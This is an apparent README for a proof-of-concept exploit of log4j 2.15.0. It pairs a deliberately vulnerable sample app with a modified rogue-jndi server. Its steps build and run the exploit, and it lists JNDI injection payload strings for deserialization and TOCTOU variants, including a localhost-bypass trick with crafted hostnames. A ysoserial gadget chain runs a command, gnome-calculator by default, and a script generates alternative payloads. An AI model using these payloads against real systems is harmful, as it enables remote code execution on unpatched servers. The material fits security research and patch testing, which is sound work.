log4j2.xml and poc.java provides an example vulnerable application built with log4j 2.15.0.
rogue-jndi is a modified version of Veracode's rogue-jndi published here
- Run get-deps.sh to obtain the necessary jar dependencies. You will also need to install maven to build rogue-jndi
- Build the poc using ./build.sh
- Build rogue-jndi by running ./build.sh within the rogue-jndi directory
- Run rogue-jndi by running the run.sh script in the rogue-jndi directory.
- Run the ./run.sh script in the outer directory for the two POCs like so
./run.sh ${jndi://localhost:1389/o=deserialization}
./run.sh ${jndi://localhost:1389/o=toctou}
For systems that are susceptible to the localhost bypass, you may run
./run.sh ${jndi://localhost#localhost.friendspacebookplusallaccessredpremium.com:1389/o=deserialization}
./run.sh ${jndi://localhost#localhost.friendspacebookplusallaccessredpremium.com:1389/o=toctou}
or
./run.sh ${jndi://localhost#macos.friendspacebookplusallaccessredpremium.com:1389/o=deserialization}
./run.sh ${jndi://localhost#macos.friendspacebookplusallaccessredpremium.com:1389/o=toctou}
These domains resolve to 127.127.127.127 and 127.0.0.1 respectively.
The deserialization payload is built using ysoserial and relies on the creative-commons-3.1 gadget chain. The default provided payload runs gnome-calculator. See the included generate-deser-payload.sh for alternative payloads.
The command ran using the URLClassLoader is specified in the rogue-jndi/run.sh scrpit.